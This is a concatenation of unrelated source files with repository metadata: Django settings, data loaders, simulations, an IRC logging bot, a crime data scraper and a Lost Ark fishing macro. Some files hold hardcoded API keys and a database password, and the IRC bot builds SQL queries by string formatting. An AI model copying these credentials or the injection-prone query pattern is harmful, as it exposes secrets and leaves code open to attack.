'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'typeidea.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
[
"boluoerzi@163.com"
] |
boluoerzi@163.com
|
bbe33eebae6cc991d331c697f0a3ebacb04af968
|
462288b945e619ae2d24d93f1ead3aa2e412f01f
|
/data_loader.py
|
8875a1ed414ba6ac0c79c87ff31a73ce1fc64708
|
[] |
no_license
|
Zilo676/neuralNetwork
|
d57a365421351b01a15cc231b9539bf42c061479
|
5be1e83daec0f034039bc1453bfb786d1cca7886
|
refs/heads/master
| 2020-03-18T00:32:48.531092
| 2018-10-12T08:10:02
| 2018-10-12T08:10:02
| 134,100,320
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,730
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 29 21:50:13 2018
@author: santit, zilo
"""
import pandas as pd
import numpy as np
import os
class End_of_DB(Exception):
def __init__(self, db_name):
self.db_name = db_name
def __str__(self):
return "End of database: " + str(self.db_name)
class data_base:
def __init__(self, name_db, batch_size, data_shift):
"""
Инициализация класса data_base
"""
self._name_db = name_db
if self._name_db[-1]!='/':
self._name_db = self._name_db + '/'
self._file_list = os.listdir(path=self._name_db)
self._cur_file_index = 0
self._cur_index = 0
self._batch_size = batch_size
self._data_shift = data_shift
self._current_data = self._load_from_file_by_index(self._cur_file_index)
def _load_from_file(self, file_name):
data = pd.read_csv(self._name_db + file_name, header=None,skiprows=1)
return data.astype(np.float32)
def _load_from_file_by_index(self, index):
return self._load_from_file(self._file_list[index])
def get_batch(self):
if (self._cur_index + self._batch_size) >= self._current_data.shape[0]:
if self._cur_file_index+1 >= len(self._file_list):
raise End_of_DB(self._name_db)
self._current_data = self._load_from_file_by_index(self._cur_file_index + 1)
self._cur_file_index += 1
self._cur_index = 0
data = self._current_data[self._cur_index:self._cur_index + self._batch_size].as_matrix()
self._cur_index += self._data_shift
return data
|
[
"plotb323@yandex.ru"
] |
plotb323@yandex.ru
|
f9fe27ffda166bdfb85ddb2f78d9825b780a74a3
|
e9dcc3b1368d4d4e4f88f7cd7eeedea3f370a99c
|
/plotInfectionTrace.py
|
a1ebe941a83c2360897c5b6866e5050f65171103
|
[] |
no_license
|
nwlandry/SimplexSIS
|
065034537b69321917c26f602575b438a22dd664
|
d70c1ae043698d2974e1ddf177c229600d569088
|
refs/heads/master
| 2022-12-24T14:38:01.547835
| 2020-06-30T02:56:23
| 2020-06-30T02:56:23
| 220,497,431
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,771
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import csr_matrix
from scipy.sparse.linalg import eigs
import random
import simplexUtilities
import simplexContagion
import pickle
from datetime import datetime
import time
import multiprocessing as mp
# graph parameters
# graph parameters
exponent = 4 # power law exponent
minDegree = 67
maxDegree = 1000
n = 10000
simplexSize = 3
isDegreeCorrelated = True
degreeDistType = "power-law"
meanSimplexDegree = 30
meanDegree = 10
isRandom = True
#simulation parameters
timesteps = 100
dt = 0.1
numNodesToRestart = 0.0001
gamma = 2
betaCritFraction = 1.03
alpha = 0.0
# Epidemic parameters
initialFraction = 0.01
x01 = np.random.choice([0, 1], size=n, p=[1-initialFraction, initialFraction])
# initialFraction = 1
# x02 = np.random.choice([0, 1], size=n, p=[1-initialFraction, initialFraction])
initialConditions = [x01]
# generate degree sequence and adjacency matrix
if degreeDistType == "uniform":
degreeSequence = simplexUtilities.generateUniformDegreeSequence(n, minDegree, maxDegree, isRandom=isRandom)
elif degreeDistType == "power-law":
degreeSequence = simplexUtilities.generatePowerLawDegreeSequence(n, minDegree, maxDegree, exponent, isRandom=isRandom)
elif degreeDistType == "poisson":
degreeSequence = simplexUtilities.generatePoissonDegreeSequence(n, meanDegree)
A = simplexUtilities.generateConfigModelAdjacency(degreeSequence)
# Calculate values needed in critical value calculation
meanDegree = simplexUtilities.meanPowerOfDegree(degreeSequence, 1)
meanSquaredDegree = simplexUtilities.meanPowerOfDegree(degreeSequence, 2)
meanCubedDegree = simplexUtilities.meanPowerOfDegree(degreeSequence, 3)
print("The mean degree is {:.2f}".format(meanDegree))
print("The mean squared degree is {:.2f}".format(meanSquaredDegree))
print("The mean cubed degree is {:.2f}".format(meanCubedDegree))
print("{} self-loops".format(np.trace(A.todense())))
#Generate simplex list
if isDegreeCorrelated:
[simplexList, simplexIndices] = simplexUtilities.generateConfigModelSimplexList(degreeSequence, simplexSize)
else:
[simplexList, simplexIndices] = simplexUtilities.generateUniformSimplexList(n, meanSimplexDegree, simplexSize)
betaCrit = meanDegree/meanSquaredDegree*gamma
beta = betaCritFraction*betaCrit
plt.figure()
start = time.time()
for x0 in initialConditions:
averageInfection, endState = simplexContagion.microscopicSimplexSISDynamics(A, simplexList, simplexIndices, gamma, beta, alpha, x0, timesteps, dt, numNodesToRestart)
plt.plot(np.linspace(0, (timesteps-1)*dt, timesteps), averageInfection)
end = time.time()
print('The elapsed time is ' + str(end-start) + 's')
plt.xlabel("time", fontsize=18)
plt.ylabel(r"$\langle I\rangle$", fontsize=18)
plt.show()
|
[
"nicholas.landry.91@gmail.com"
] |
nicholas.landry.91@gmail.com
|
656b2b5c2d0909c3a0a06634440e9316cfac9d4d
|
fd63e5cfc880432d7bdb7c36481266d681539f76
|
/no_shebang.py
|
31a586f00b09957136f2cb41d57bd224aa798c43
|
[] |
no_license
|
MasterOlaga/mycode
|
de8425e5f32affcd803ecb44cb6bdba1f327f774
|
69f6b8747f1dbc5ae4762a39fb5aaa0b4650ab63
|
refs/heads/main
| 2023-04-10T18:57:48.585811
| 2021-05-04T12:05:11
| 2021-05-04T12:05:11
| 361,783,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 97
|
py
|
print("hello")
print("Did you say, Yello")
print("No, I said Hello, but that\'s close enough.")
|
[
"xcurl2009@hotmail.com"
] |
xcurl2009@hotmail.com
|
bdd46fe9ef30e0c61b9a28258ff2c826f1bcd0a7
|
332d39e324f72b56b77607970812675e58742b15
|
/prob6-min-max-unsorted-array.py
|
fcb87f60c4f95f58502e7b4299ae2a6589121376
|
[] |
no_license
|
sean-stanley/Data-Structures-and-Algorithms--project-2
|
789d01c5156a85c17f2c803f1288a8d045705d2b
|
94cbe2642277cdf0d438f6f1ea61c28084cc388d
|
refs/heads/master
| 2020-07-08T16:16:33.881502
| 2019-08-22T05:36:41
| 2019-08-22T05:36:41
| 203,721,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,424
|
py
|
import math
import random
def get_min_max(ints):
"""
Return a tuple(min, max) out of list of unsorted integers.
Args:
ints(list): list of integers containing one or more integers
"""
curr_min = math.inf
curr_max = -math.inf
for num in ints:
if int(num) > curr_max:
curr_max = num
if int(num) < curr_min:
curr_min = num
return (int(curr_min), int(curr_max))
# Example Test Case of Ten Integers
def tests():
"""Print "Pass" for 1 straightforward test and 2 edge cases."""
# test 1
list_of_ints = [i for i in range(0, 10)] # a list containing 0 - 9
random.shuffle(list_of_ints)
print("Pass" if ((0, 9) == get_min_max(list_of_ints)) else "Fail")
# test 2 (edgy) negative numbers
list_of_ints = [i for i in range(-10, 0)]
random.shuffle(list_of_ints)
print("Pass" if ((-10, -1) == get_min_max(list_of_ints)) else "Fail")
# test 3 (edgy) floats
list_of_inputs = [i/2 for i in range(0, 20, 1)]
random.shuffle(list_of_inputs)
print("Pass" if ((0, 9) == get_min_max(list_of_inputs)) else "Fail")
# test 4 (edgy) tiny list
print("Pass" if ((3, 3) == get_min_max([3.14])) else "Fail")
# test 4 large ints
list_of_ints = [i for i in range(-1000, 1000, 10)]
random.shuffle(list_of_ints)
print("Pass" if ((-1000, 990) == get_min_max(list_of_ints)) else "Fail")
tests()
|
[
"sean@redheadweb.nz"
] |
sean@redheadweb.nz
|
a65adf6823bcb9b87df180963c80b6a02c76c94f
|
04842b58ea1b42a45b343e319e0b362f6e9fea58
|
/beta/email_invite.py
|
b09166c8481387918060814951e16932a5b40f5f
|
[
"Artistic-2.0"
] |
permissive
|
sanketnawle/alpha
|
b8a7af06d162523faf294cf732ff455bb9ba3064
|
fd6c702b58685b67f35a4e772d1287fb49749696
|
refs/heads/master
| 2021-01-22T06:18:47.005611
| 2015-04-14T05:31:04
| 2015-04-14T05:31:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 816
|
py
|
#!/usr/bin/env python
try:
import xlrd
except ImportError:
print "Error importing"
import string
import re
import json
import sys
import os
arguments = sys.argv
file_name = arguments[1]
emails = []
errors = []
wb = xlrd.open_workbook(file_name)
for sheet in wb.sheets():
number_of_columns = sheet.ncols
number_of_rows = sheet.nrows
if number_of_columns > 1000:
number_of_columns = 1000
if number_of_rows > 1000:
number_of_rows = 1000
for col in range(number_of_columns):
for row in range(number_of_rows):
value = (sheet.cell(row, col).value)
value = str(value)
if value.replace(" ", "") == '':
continue
else:
emails.append(value)
os.remove(file_name)
print json.dumps(emails)
|
[
"K@dhcp-10-4-143-39.wireless.rochester.edu"
] |
K@dhcp-10-4-143-39.wireless.rochester.edu
|
a215d60f2ee732a42e6179f1c3093a74ca35917b
|
76d6f79f3b1a2d604ef05b39ac22ef1402ce95ed
|
/postional_keyword_kwargs.py
|
8bebda4495396928708108c0ca3fdd9f1757c004
|
[] |
no_license
|
anunay-kumar/python-datastructure
|
55616976776b7d0818af7d679a1ca67a4b1562ad
|
a8056fca5dd1bc05e9f2904b7ecbb9a9914e1539
|
refs/heads/main
| 2023-06-25T12:08:41.124572
| 2021-07-20T13:50:34
| 2021-07-20T13:50:34
| 362,399,464
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 641
|
py
|
#!/usr/bin/python
#using postional and dynamic keywords arguments
def format_customer(first_name,last_name,**kwargs):
strLocation = ""
for key, value in kwargs.items():
if key == "location":
strLocation = "(" + value + ")"
print(kwargs['location'])
print(type(kwargs))
print(kwargs)
return first_name + " " + last_name + strLocation
#using postional and keyword argumaets
def format_customer1(first_name,last_name,location=None):
if location:
return '%s %s (%s)' % (first_name, last_name, location)
else:
return '%s %s' % (first_name, last_name)
|
[
"noreply@github.com"
] |
anunay-kumar.noreply@github.com
|
8c42d6d5f5f8e007d9bf9e0ade965a3b28f5cc26
|
c7faf6b2e3d4511c3635589ed0bbd3647cb6425b
|
/test.py
|
bc5078eb105cc2df3fd147c214c122222be09323
|
[] |
no_license
|
nnaliu/PennApps2015
|
2f183c536f7ac95d50125dc82caa3348325bacad
|
594c032384be6766fe54fbdf51265361e794c391
|
refs/heads/master
| 2021-01-21T11:08:32.342303
| 2015-09-05T22:23:58
| 2015-09-05T22:23:58
| 41,969,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,290
|
py
|
import urllib2
from zipfile import ZipFile
from StringIO import StringIO
import json
import csv
from pymongo import MongoClient, GEO2D
client = MongoClient()
db = client.crimes
philly_crimes = db.philly
philly_crimes.ensure_index([('loc', GEO2D)])
url = urllib2.urlopen("http://gis.phila.gov/gisdata/police_inct.zip")
zipfile = ZipFile(StringIO(url.read()))
with zipfile.open('police_inct.csv') as csvfile:
crimes = csv.DictReader(csvfile, delimiter=',')
for crime in crimes:
print crime['TEXT_GENERAL_CODE']
check_duplicate = philly_crimes.find_one({'_id': crime['OBJECTID']})
if check_duplicate == None and crime['DISPATCH_DATE'] > '2015-07-01' and \
(crime['POINT_X'] != "" and crime['POINT_Y'] != ""):
record = {}
record['_id'] = crime['OBJECTID']
record['date'] = crime['DISPATCH_DATE']
record['time'] = crime['DISPATCH_TIME']
record['address'] = crime['LOCATION_BLOCK']
record['type'] = crime['TEXT_GENERAL_CODE']
record['loc'] = [float(crime['POINT_X']), float(crime['POINT_Y'])]
philly_crimes.insert_one(record)
print(record)
#url = 'https://api.everyblock.com/content/philly/topnews/?token=2468648eaf3a967061f727a478bd0b703797dc01&schema=crime&date=descending'
#while url != None:
# response = urllib2.urlopen(url)
# data = json.load(response)
# for item in data['results']:
# check_duplicate = philly_crimes.find_one({'_id': item['id']})
# if check_duplicate == None:
# record = {}
# record['_id'] = item['id']
# record['title'] = item['title']
# record['item_date'] = item['item_date']
# record['location'] = item['location_name']
# record['url'] = item['url']
# addressUrl = 'https://maps.googleapis.com/maps/api/geocode/json?address=' \
# + record['location'].replace(' ', '+') + ',+Philadelphia,+PA&key=AIzaSyB9FBh9QtZ1UbwAyn5rr_jXx8dlTk8lONc'
# addressResponse = urllib2.urlopen(addressUrl)
# addressData = json.load(addressResponse)
# addressDataLocation = addressData['results'][0]['geometry']['location']
# record['loc'] = [addressDataLocation['lng'], addressDataLocation['lat']]
# philly_crimes.insert_one(record)
# print(record['lat'])
# print
# else:
# break
#url = data['next']
# for i in all_records:
# print(i)
#Google Maps API Key: AIzaSyB9FBh9QtZ1UbwAyn5rr_jXx8dlTk8lONc
|
[
"annaliu@college.harvard.edu"
] |
annaliu@college.harvard.edu
|
2941126397a260246fd63bc18c58f7812cab2e59
|
330802c408d66e1c6e37dd7087f2f949570438ff
|
/Python/easy/762.py
|
4e6a6820f71fc86b1e8c568d33872abc168f8494
|
[] |
no_license
|
HeyZOJian/leetcode
|
ea93da6c4f6cbd6bfb60b9f0a0c4cb21a5907687
|
5cae29c4825c122b1fdec9ead32939a20bf3129d
|
refs/heads/master
| 2021-05-05T07:10:50.104077
| 2018-10-05T01:44:13
| 2018-10-05T01:44:13
| 118,855,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
"""
762. Prime Number of Set Bits in Binary Representation
Given two integers L and R,
find the count of numbers in the range [L, R] (inclusive) having a prime number of set bits in their binary representation.
(Recall that the number of set bits an integer has is the number of 1s present when written in binary.
For example, 21 written in binary is 10101 which has 3 set bits. Also, 1 is not a prime.)
Input:
L = 6, R = 10
Output:
4
Explanation:
6 -> 110 (2 set bits, 2 is prime)
7 -> 111 (3 set bits, 3 is prime)
9 -> 1001 (2 set bits , 2 is prime)
10->1010 (2 set bits , 2 is prime)
Note:
L, R will be integers L <= R in the range [1, 10^6].
R - L will be at most 10000.
先打个10^6内二进制和的素数的表
"""
class Solution:
def countPrimeSetBits(self, L, R):
"""
:type L: int
:type R: int
:rtype: int
"""
primes = {2, 3, 5, 7, 11, 13, 17, 19}
return sum([bin(num).count("1") in primes
for num in range(L, R+1)])
if __name__ == "__main__":
print(Solution().countPrimeSetBits(6, 10))
|
[
"hellozojian@gmail.com"
] |
hellozojian@gmail.com
|
1c4cf0013c46249d218e7490a27b50072971f949
|
9ddfd30620c39fb73ac57e79eae0a001c45db45f
|
/addons/product_quotation_tracking/models/product_template.py
|
064724ad58d38da8ad5a7bb62235b8a2d14da913
|
[] |
no_license
|
zamzamintl/silver
|
a89bacc1ba6a7a59de1a92e3f7c149df0468e185
|
8628e4419c4ee77928c04c1591311707acd2465e
|
refs/heads/master
| 2023-01-06T20:29:25.372314
| 2020-10-29T21:02:41
| 2020-10-29T21:02:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,164
|
py
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api, exceptions, _
from datetime import date, datetime, time, timedelta
from odoo.fields import Date, Datetime
from odoo.tools import float_compare
import odoo.addons.decimal_precision as dp
class ProductTemplate(models.Model):
_inherit = 'product.template'
# TODO Override Default Field for Tracking Porpoise
name = fields.Char('Name', track_visibility='onchange')
type = fields.Selection(track_visibility='onchange')
categ_id = fields.Many2one(track_visibility='onchange')
list_price = fields.Float(track_visibility='onchange')
standard_price = fields.Float(track_visibility='onchange')
sale_ok = fields.Boolean(track_visibility='onchange')
purchase_ok = fields.Boolean(track_visibility='onchange')
uom_id = fields.Many2one(track_visibility='onchange')
default_code = fields.Char(track_visibility='onchange')
barcode = fields.Char(track_visibility='onchange')
invoice_policy = fields.Selection(track_visibility='onchange')
purchase_method = fields.Selection(track_visibility='onchange')
sale_delay = fields.Float(track_visibility='onchange')
|
[
"mohamed.abdelrahman@businessborderlines.com"
] |
mohamed.abdelrahman@businessborderlines.com
|
6fa4ee18cbed580b920fd118075a75733be9f362
|
cb798b7b41ce53ae40ffbdae153223d4f9da710a
|
/test.py
|
a865f195f2319bdc84e285d98fb9e0f26cea244c
|
[
"MIT"
] |
permissive
|
sknsensor/ProjektPV
|
d4fd80e4cd2e504a557b0a180777b54a6964aa02
|
666703301af31bfa841067a62d70bceafc7cdc56
|
refs/heads/master
| 2023-09-02T23:46:10.063321
| 2021-10-08T07:55:17
| 2021-10-08T07:55:17
| 412,421,373
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 64
|
py
|
import datetime
day = datetime.datetime.now()
print(day)
|
[
"noreply@github.com"
] |
sknsensor.noreply@github.com
|
feed65fa40a4abf2962765310952122a4f84745f
|
16f44549df680ffc6511066d9fd17fbca7cc2b73
|
/appnomi/apps.py
|
013825213347d1d1cf27265c57353f1a313517c8
|
[] |
no_license
|
ShahzodAhadov/BlogProject
|
f483c29a16746e4516a97f37a59ca98147e6fe7d
|
501e3cc76e10a66c9582b592cfed9e1d0c90a78e
|
refs/heads/master
| 2023-07-12T06:55:54.563040
| 2021-08-14T13:45:46
| 2021-08-14T13:45:46
| 395,113,602
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
from django.apps import AppConfig
class AppnomiConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'appnomi'
|
[
"88456020+ShahzodAhadov@users.noreply.github.com"
] |
88456020+ShahzodAhadov@users.noreply.github.com
|
a8ed538a69a20d50846b39626eeafcdfd0aa7369
|
d513604d844b116020bd7e0a2b6d5ca5337836ef
|
/Package1/Module1/__init__.py
|
3313db9ea5869b18d5dfa2ae6e954f7024d16496
|
[] |
no_license
|
sbenkler/osparc-lab-ci-travis-trial
|
cf1110bdefa469ab1b717bb2d98e3f2d7fd96f38
|
f75682322c70f989228434cb8d45ac7f735fec4b
|
refs/heads/master
| 2021-08-23T21:16:55.739360
| 2017-12-06T14:41:51
| 2017-12-06T14:41:51
| 113,040,117
| 0
| 0
| null | 2017-12-04T12:33:34
| 2017-12-04T12:33:34
| null |
UTF-8
|
Python
| false
| false
| 28
|
py
|
''' Documents this file '''
|
[
"benkler@zurichmedtech.com"
] |
benkler@zurichmedtech.com
|
2136a658ded5696c4d73ee134946c16f6b5d2f4c
|
f5b578d57dcd097c7396aaf43c79ab1f47434291
|
/6.py
|
e65f5f8155612f1cc0d659aa8f61af05854f3512
|
[] |
no_license
|
v-piatakova/python
|
d357bae1166aceed7d79691a59614055c3557500
|
5504d0b3d61a9b904163d8e988f0623e75d7307d
|
refs/heads/master
| 2021-12-06T23:19:03.576740
| 2021-11-12T18:51:45
| 2021-11-12T18:51:45
| 199,714,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 216
|
py
|
string = input("Enter some string")
def get_shortest_word(string):
split_str = string.split(" ")
print(split_str)
your_string = min(split_str, key=len)
print(your_string)
get_shortest_word(string)
|
[
"noreply@github.com"
] |
v-piatakova.noreply@github.com
|
975fea9c39c6f2c440038597d0c37bb3c74458ed
|
b1bd2f6c34539a90fbe114bbe88ded74ddffc488
|
/learning/GUI/chapter2/entry1.py
|
f5947011c3751f8fce33a3281c6d91a43fb78916
|
[] |
no_license
|
Calvin-WangA/learning
|
e6a6bfab6ec685f96799f22dbdbde64b6be3454b
|
f4e5599be0451eae4ac51270d03b0b9d1dd073db
|
refs/heads/master
| 2021-01-13T13:21:05.179958
| 2016-04-19T02:40:40
| 2016-04-19T02:40:40
| 52,593,144
| 0
| 0
| null | 2016-03-15T13:37:24
| 2016-02-26T09:21:53
|
Python
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
'''
Created on 2016年3月4日
@author: CasparWang
'''
from tkinter import *
from quitter import Quitter
def fetch():
print('Input => "%s"' %ent.get())
root = Tk()
ent = Entry(root)
ent.insert(0,'Type words here')
ent.pack(side=TOP,fill=X)
ent.focus()
ent.bind('<Return>',(lambda event: fetch()))
btn = Button(root,text='Fetch',command=fetch)
btn.pack(side=LEFT)
Quitter(root).pack(side=RIGHT)
root.mainloop()
|
[
"18971674156@163.com"
] |
18971674156@163.com
|
6c4251722cd0f359b551bc245748f24cc8818cdf
|
1ed48f51e859618b63ab6d14a82f94aa512c7ba1
|
/irc bot with sql intergration.py
|
e75a8a118e7e1b8f83ab1d059cbcd3a07128508b
|
[] |
no_license
|
Panda911/vindra
|
6866c0fbd7ab7133672ccccfe0003e9ae1470f3c
|
95d1170d848752c335a9c89141332d71654671fe
|
refs/heads/master
| 2021-01-10T16:03:08.031837
| 2016-03-17T12:26:38
| 2016-03-17T12:26:38
| 54,115,962
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,206
|
py
|
import socket, MySQLdb
from time import strftime
def contains(str, test):
for c in range(len(str)-len(test)+1):
if test == str[c:c+len(test)]:
return True
return False
def debug(message):
if debug:
print message
debug = True
network = 'chat.freenode.net'
port = 6667
irc = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
username = ''
door = 0
debug_prefix = '[DEBUG]: '
# db = MySQLdb.connect('localhost', 'root', 'toor', 'vindra')
db = MySQLdb.connect('localhost', 'root', 'toor', 'vindra')
cursor = db.cursor()
print ("Starting up...")
irc.connect ( ( network, port ) )
#print irc.recv ( 4096 )
irc.send ( 'NICK vindra\r\n' )
irc.send ( 'USER vindra vindra vindra :Python IRC\r\n' )
irc.send ( 'JOIN #hacklabto\r\n' )
print ("Connected!")
while True:
data = irc.recv ( 4096 )
debug("baud: 4096")
if data.find ( 'PING' ) != -1:
irc.send ( 'PONG ' + data.split() [ 1 ] + '\r\n' )
if data.find ( 'doorbot'):
debug(debug_prefix + 'Got Message: ' + str(data)) # echo35 debug
if data.find ( 'HackLab' ):
split = data.split('hacklabto :')
message = str(data).split("#")
if (len(message) > 1):
message = message[1].replace('hacklabto :', '').replace(' has', '').replace(' Classroom.', '').replace(' HackLab.', '').replace(' HackLab', '').replace('\r\n', '')
if contains(message, "left"):
debug(debug_prefix + "Got alias leaving: " + message.replace(' left', ''))
username = message.replace(' left', '')
query = "INSERT INTO test(username, str) VALUES('%s', '%s')" % (username, "EXIT") #FINISH WRITING PROPER MYSQL QUERY - ECHO35
cursor.execute(query)
db.commit()
elif contains(message, "entered"):
debug(debug_prefix + "Got alias entering: " + message.replace(' entered', ''))
username = message.replace(' entered', '')
query = "INSERT INTO test(username, str) VALUES('%s', '%s')" % (username, "ENTER")
cursor.execute(query)
db.commit()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
b6cddc9bc45ab2cf0a234d1a3ec9f3f72a12841b
|
8ea7f954fd3316aa36803e85b19572c39d0f5d49
|
/lostark_fishing.py
|
78ab83887d14c371063b24f34978deb599857f50
|
[] |
no_license
|
hyeokju1313/LostArkFishingMacro
|
5d00bc6302e516f35f215b67d5ddd985a724532b
|
34bc751d8bf247272fb0159862fde1df38b2a356
|
refs/heads/main
| 2023-04-14T15:45:23.028151
| 2021-04-26T11:26:47
| 2021-04-26T11:26:47
| 361,723,880
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,286
|
py
|
import fishing_image as fi
import fishing_place as fp
import pyautogui as pa
import random
import time
from init_config import *
# - 이미지 이름을 입력 받아 이미지가 존재하게 될경우 입력 받은 Key 이벤트 발생 -
def findImgAndPressKey(imgName, key, startPos, cnt=60, confidence=.8, wait=0.1):
posBtn = fi.findImageUntil(imgName, startPos=startPos, cnt=cnt, confidence=confidence, wait=wait)
if posBtn == None:
return False
else:
pa.press(key)
return True
# - 자동 낚시 main 함수 -
def fishingLostArk(wait, setPos=1, fishingKey='w'):
fishingFailCnt = 0
posList = []
# - 마우스를 움직여 3개의 포인트를 지정
if setPos == 0:
posList = fp.getMousePointWithKey(3)
# - init.txt 의 낚시터별 포인트를 불러옴
else:
posList = fp.getFishingPointList()
print('point of init : ', str(posList))
# - init_config.py 에서 저장한 값
width = FISHING_WIDTH
height = FISHING_HEIGHT
# - 자동 낚시 무한 반복 -
while True:
# - 20번이상 실패하면 프로그램 종료 -
if fishingFailCnt > 20:
print("Fishing Too Much Fail")
return
if len(posList) > 0:
idx = random.randrange(0, len(posList))
# idx = fising_cnt % 3
pa.moveTo(posList[idx][0], posList[idx][1], 1)
else:
print("Can't get fishing point")
return
pa.press(fishingKey)
time.sleep(1)
# - 느낌표를 검출할 영역
region = fi.makeRegion(fi.getCenterOfScreen(), width, height)
res = findImgAndPressKey(FISHING_EXCLAMATION_MARK_IMG_NAME, fishingKey, startPos=region,
cnt=FISHING_EXCLAMATION_MARK_DETECT_CNT, confidence=0.8, wait=0.1)
if res == True:
print('Fishing Success')
time.sleep(wait)
if fishingFailCnt > 0:
fishingFailCnt -= 1
else:
print('fishing Fail')
fishingFailCnt += 1
time.sleep(2)
if __name__ == "__main__":
fishingLostArk(FISHING_WAIT_TIME, setPos=1, fishingKey='w')
|
[
"noreply@github.com"
] |
hyeokju1313.noreply@github.com
|
6fa5daef7a5999fbaf0e98abc0fd6ca6b28c067e
|
79ea92ddeae7aa912a57ee1b8262daf30f6b8a59
|
/test.py
|
ef45751f51e5322c9bd4a7b50794f00fe4983019
|
[] |
no_license
|
gn3112/roboenv_pybullet
|
25a5d5f066f8cbd60fb434548750961a2b295016
|
da18bff3b69e5aaee886932ef05176d1aeb4b87e
|
refs/heads/master
| 2021-04-08T12:03:21.065414
| 2020-07-18T14:48:33
| 2020-07-18T14:48:33
| 248,774,031
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,071
|
py
|
import pybullet_data
import pybullet as p
import time
import math
from datetime import datetime
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def reset():
for i in range(numJoints):
p.resetJointState(kukaId, i, rp[i])
def add_object():
test_visual = p.createVisualShape(p.GEOM_BOX, halfExtents=[1,1,1],collisionFramePosition=[0,0,0])
test_collision = p.createCollisionShape(p.GEOM_BOX, halfExtents=[1,1,1])
test_body = p.createMultiBody(baseMass=0, baseCollisionShapeIndex=test_collision, \
baseVisualShapeIndex=test_visual, basePosition = [0, 0, 1])
return test_body
#clid = p.connect(p.SHARED_MEMORY)
print(p.__file__)
p.connect(p.DIRECT)
p.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally
p.loadURDF("plane.urdf", [0, 0, -0.3], useFixedBase=True)
kukaId = p.loadURDF("kuka_iiwa/model.urdf", [0, 0, 0], useFixedBase=True)
quater = p.getQuaternionFromEuler([0,0,0])
p.resetBasePositionAndOrientation(kukaId, [0, 0, 0], quater)
kukaEndEffectorIndex = 6
numJoints = p.getNumJoints(kukaId)
if (numJoints != 7):
exit()
#lower limits for null space
ll = [-.967, -2, -2.96, 0.19, -2.96, -2.09, -3.05]
#upper limits for null space
ul = [.967, 2, 2.96, 2.29, 2.96, 2.09, 3.05]
#joint ranges for null space
jr = [5.8, 4, 5.8, 4, 5.8, 4, 6]
#restposes for null space
rp = [0, 0, 0, 0.5 * math.pi, 0, -math.pi * 0.5 * 0.66, 0]
#joint damping coefficents
jd = [0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1]
for i in range(numJoints):
p.resetJointState(kukaId, i, rp[i])
p.setGravity(0, 0, -10)
t = 0.
prevPose = [0, 0, 0]
prevPose1 = [0, 0, 0]
hasPrevPose = 0
useNullSpace = 0
count = 0
useOrientation = 1
useSimulation = 1
trailDuration = 15
logId1 = p.startStateLogging(p.STATE_LOGGING_GENERIC_ROBOT, "LOG0001.txt", [0, 1, 2])
logId2 = p.startStateLogging(p.STATE_LOGGING_CONTACT_POINTS, "LOG0002.txt", bodyUniqueIdA=2)
# for i in range(5):
# print("Body %d's name is %s." % (i, p.getBodyInfo(i)[1]))
viewMatrix = p.computeViewMatrix(cameraEyePosition=[0,1.5,1.5],
cameraTargetPosition=[0,0,0],
cameraUpVector=[0,1,0])
projectionMatrix = p.computeProjectionMatrixFOV(
fov=45.0,
aspect=1.0,
nearVal=0.1,
farVal=3.1)
# plotting world and camera reference frame
viewMatrix_arr = np.array([viewMatrix[i-4:i] for i in range(4,20,4)])
u1 = np.matmul(np.linalg.inv(viewMatrix_arr).T,np.array([1,0,0,1]))
u2 = np.matmul(np.linalg.inv(viewMatrix_arr).T,np.array([0,1,0,1]))
u3 = np.matmul(np.linalg.inv(viewMatrix_arr).T,np.array([0,0,1,1]))
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot([0,1],[0,0],[0,0],color='r')
ax.plot([0,0],[0,1],[0,0],color='g')
ax.plot([0,0],[0,0],[0,1],color='b')
